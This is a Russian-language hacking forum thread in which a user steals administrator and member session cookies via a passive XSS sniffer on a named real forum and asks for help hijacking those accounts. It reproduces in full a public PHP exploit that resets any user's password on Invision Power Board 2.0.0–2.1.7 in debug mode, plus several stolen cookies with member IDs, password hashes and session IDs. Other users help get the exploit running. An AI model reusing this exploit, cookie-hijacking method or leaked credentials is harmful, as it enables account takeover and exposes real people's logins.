В общем, уважаемые античатовцы такая запара. Вчера значит, создал я сайтец что бы вытащить хеши одного человека с админ правами. Допустим он редиска. Перед этим проверял на друге - так вот все отлично , вставив его хеш и ID я уже мог под ним ходить, пробую уже вечером на админе (а позже пробовал и на своем мульте) - я не захожу по плану под его аккаунтом, я почему то выкидываюсь из аккаунта вообще. Возможно потому, что делал не сразу , а через 4 часа. Хотя по идее зная хеш и member id я должен спокойно висеть под ним. Юзал пассивную Xss для 2.1.7, у кого была такая проблема или кто сталкивался напишите пожалуйста.

Вот уже второй раз он по ссылке прошел, может стоит какой патч специально для админов ?!

Есть такая великая вещь под названием "Session"

сесию нужно чтобы попасть

Я входил под чужим акком и без сессии, но я понял в чем тема. Короче пашет без сессии на юзерах и модерах, а на админов не пашет потому что они соеденены через базу данных с одной игровой фишкой. Сессия тут не при чем, я ее тоже пробовал. Вы бы лучше посоветовали уязвимость через модера какую)))

Кому интересно fo*rum.je*di.co*m.ua (без *) ссылка.
Кому интересно для опыта поиграть с этим форумом отписывайтесь))) Он хорошо сделан, будет в удовольствие разбираться...

ГО http://milw0rm.com/exploits/4841

Хм, еще вопрос.

<?php /*
Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. */ // The forum's address up to and including 'index.php' $site = "http://localhost/forums/index.php"; // An existing user's login name $name = "admin"; // The new password(3-32 characters) $pass = "1234"; // You can use a proxy... // $proxy = "1.2.3.4:8080"; // ----------------------------- $site .= "?"; $suffix = ""; $name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } else { $suffix = "&debug=1"; $curl = curl_init($site.'act=Reg&CODE=10'.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { $prefix = $regs[1]; $regid = $regs[2]; $regcode = $regs[3]; } } if (!isset($regid) || !isset($regcode)) { echo "Error: Probably not vulnerable, or no forum found"; exit; } $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { change_pass($regcode,$regid,$regs[1],$regs[2]); } function change_pass($regcode,$regid,$vid,$userid) { global $site, $proxy, $name, $pass; $curl = curl_init($site.$suffix); curl_setopt($curl, CURLOPT_PROXY, $proxy); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}"); curl_setopt($curl, CURLOPT_TIMEOUT, 10); $page = curl_exec($curl); curl_close($curl); echo "Password Changed!"; exit; } ?> # milw0rm.com [2006-11-01]

Делал этот код (естественно заменял что надо), почему то программа выходит с такой ошибкой Fatall error: Call to undefined function curl_init() in C:\sploits\- Online 37. В нете нашел библиотеку dll не помогло. Опять же гуру помогите советом))

Может кто сталкивался на практике... У друга моего похожая группа на том форуме, хеш которой я не могу использовать (с сессией или же без). Смотрите феномен, когда он 3 раза подряд заходит на мойт сайт со сниффом не выходя из оперы хеш остается таким же, когда закрывает оперу, открывает мое ПМ и переходит по ссылке (периодизация осуществляется 3 раза) ровно три раза меняется хеш... Какие идеи ???!!!

Хм, еще вопрос.



Делал этот код (естественно заменял что надо), почему то программа выходит с такой ошибкой Fatall error: Call to undefined function curl_init() in C:\sploits\- Online 37. В нете нашел библиотеку dll не помогло. Опять же гуру помогите советом))
Нужен курл епть.
Поставь PHP с уже установленным CURL
Или ваще связку сервера...
Библиотеку то ты нашёл
Её то надо вписать в php.ini ;)
ps
А мож и раскоментировать...

Вот про связку сервера заинтриговали (никогда не юзал, а может и юзал но не знал :D) ))) Раскоментировал я библиотеку в php.ini и кидал в system32. А вы какой прогой для компиляции *.php пользуетесь ?

Вот про связку сервера заинтриговали (никогда не юзал, а может и юзал но не знал :D) ))) Раскоментировал я библиотеку в php.ini и кидал в system32. А вы какой прогой для компиляции *.php пользуетесь ?

Не совсем понятно нафига его компилировать. Берешь денвер и юзаешь его. Но лучше будет найти хостера с поддержкой curl. Учти что тот сплоит который ты выложил работает только в том случае если форум находится в режиме отладки :) если же нет то ты обломаешься

Блять. Скачай WampServer, поройся в настройках и ты найдешь там все.

Почему под одними хешами я захожу нормально, под другими немогу - выкидывает в "Гости". Пример : Под 1ым нормально, под2ым нет.

anonlogin=-1;%20member_id=3926;%20pass_hash=31248c0ecba7d6948 f1a028d0bbcc6f9;%20open_qr=0;%20topicmode=linear;% 20forum_read=a%3A2%3A%7Bi%3A191%3Bi%3A1246461404%3 Bi%3A449%3Bi%3A1247070759%3B%7D;%20ipb-myass-div=435,508;%20modtids=%2C;%20topicsread=a%3A6%3A% 7Bi%3A35777%3Bi%3A1247082742%3Bi%3A35044%3Bi%3A124 7082772%3Bi%3A34756%3Bi%3A1247082973%3Bi%3A30893%3 Bi%3A1247083051%3Bi%3A33237%3Bi%3A1247083189%3Bi%3 A22520%3Bi%3A1247083327%3B%7D;%20b=b;%20session_id =3d8b1c13cd417a37f931ce1519266f95;%20__utma=168064 698.491674746.1216324599.1218394326.1218401283.68


collapseprefs=379;%20anonlogin=-1;%20member_id=7496;%20pass_hash=e23136e9bea4b77f2 cb9b0287f976a49;%20forum_read=a%3A61%3A%7Bi%3A381% 3Bi%3A1245735867%3Bi%3A382%3Bi%3A1246399502%3Bi%3A 380%3Bi%3A1246371572%3Bi%3A38%3Bi%3A1245074301%3Bi %3A208%3Bi%3A1245147089%3Bi%3A383%3Bi%3A1246371574 %3Bi%3A326%3Bi%3A1245336119%3Bi%3A289%3Bi%3A124549 8836%3Bi%3A211%3Bi%3A1245778044%3Bi%3A277%3Bi%3A12 45501919%3Bi%3A338%3Bi%3A1247078242%3Bi%3A260%3Bi% 3A1245511235%3Bi%3A258%3Bi%3A1245827877%3Bi%3A39%3 Bi%3A1246103112%3Bi%3A427%3Bi%3A1245614133%3Bi%3A4 59%3Bi%3A1245614081%3Bi%3A337%3Bi%3A1247054334%3Bi %3A460%3Bi%3A1247058467%3Bi%3A401%3Bi%3A1245568515 %3Bi%3A379%3Bi%3A1247054354%3Bi%3A247%3Bi%3A124557 1154%3Bi%3A356%3Bi%3A1245873338%3Bi%3A391%3Bi%3A12 45929129%3Bi%3A390%3Bi%3A1245614093%3Bi%3A392%3Bi% 3A1246371596%3Bi%3A388%3Bi%3A1245614109%3Bi%3A387% 3Bi%3A1245614122%3Bi%3A385%3Bi%3A1245614144%3Bi%3A 384%3Bi%3A1245614149%3Bi%3A386%3Bi%3A1245663581%3B i%3A273%3Bi%3A1246966525%3Bi%3A371%3Bi%3A124656215 6%3Bi%3A
347%3Bi%3A1245673001%3Bi%3A209%3Bi%3A1247042730%3B i%3A327%3Bi%3A1246204051%3Bi%3A373%3Bi%3A124569721 1%3Bi%3A449%3Bi%3A1245699666%3Bi%3A396%3Bi%3A12457 35863%3Bi%3A316%3Bi%3A1247058602%3Bi%3A217%3Bi%3A1 247045329%3Bi%3A62%3Bi%3A1246880794%3Bi%3A357%3Bi% 3A1245827888%3Bi%3A214%3Bi%3A1247078245%3Bi%3A359% 3Bi%3A1247044169%3Bi%3A393%3Bi%3A1246306708%3Bi%3A 237%3Bi%3A1246204020%3Bi%3A274%3Bi%3A1246732099%3B i%3A457%3Bi%3A1245960496%3Bi%3A278%3Bi%3A124628316 5%3Bi%3A456%3Bi%3A1246096668%3Bi%3A353%3Bi%3A12461 26926%3Bi%3A435%3Bi%3A1246124285%3Bi%3A132%3Bi%3A1 246203539%3Bi%3A64%3Bi%3A1246832648%3Bi%3A439%3Bi% 3A1246528389%3Bi%3A389%3Bi%3A1246371530%3Bi%3A453% 3Bi%3A1246481569%3Bi%3A454%3Bi%3A1246458384%3Bi%3A 398%3Bi%3A1246620955%3Bi%3A370%3Bi%3A1246879597%3B i%3A184%3Bi%3A1246879782%3B%7D;%20modtids=%2C;%20t opicsread=a%3A2%3A%7Bi%3A35811%3Bi%3A1247080137%3B i%3A36112%3Bi%3A1247080187%3B%7D;%20ipb-myass-div=1154,518;%20b=b;%20session_id=f5d3eb68b544ada6 386ad7d97cb4d2a9



Вот третий тоже не юзается

open_qr=0;%20forum_read=a%3A18%3A%7Bi%3A292%3Bi%3A 1245070367%3Bi%3A208%3Bi%3A1245071371%3Bi%3A379%3B i%3A1246466448%3Bi%3A450%3Bi%3A1245231487%3Bi%3A39 8%3Bi%3A1245231500%3Bi%3A316%3Bi%3A1245270715%3Bi% 3A278%3Bi%3A1245422471%3Bi%3A381%3Bi%3A1245658550% 3Bi%3A380%3Bi%3A1246385981%3Bi%3A383%3Bi%3A1245517 751%3Bi%3A459%3Bi%3A1246190925%3Bi%3A460%3Bi%3A124 5595787%3Bi%3A382%3Bi%3A1245658301%3Bi%3A257%3Bi%3 A1246019273%3Bi%3A386%3Bi%3A1246190518%3Bi%3A255%3 Bi%3A1246527409%3Bi%3A289%3Bi%3A1246535889%3Bi%3A2 54%3Bi%3A1246636049%3B%7D;%20member_id=8134;%20pas s_hash=0378cb061b5fb1d1b06b1d6f080a6861;%20topicsr ead=a%3A1%3A%7Bi%3A36113%3Bi%3A1247085326%3B%7D;%2 0b=b;%20ipb-myass-div=385,739;%20session_id=41d1b5f206fa19b925eda5c4 bf5c3ca6

Еще вопрос, если мне на снифф не передается инфо с salt, значит соли просто нету в процессе шифрования на форуме ? Только пасс хеш, айди и тд...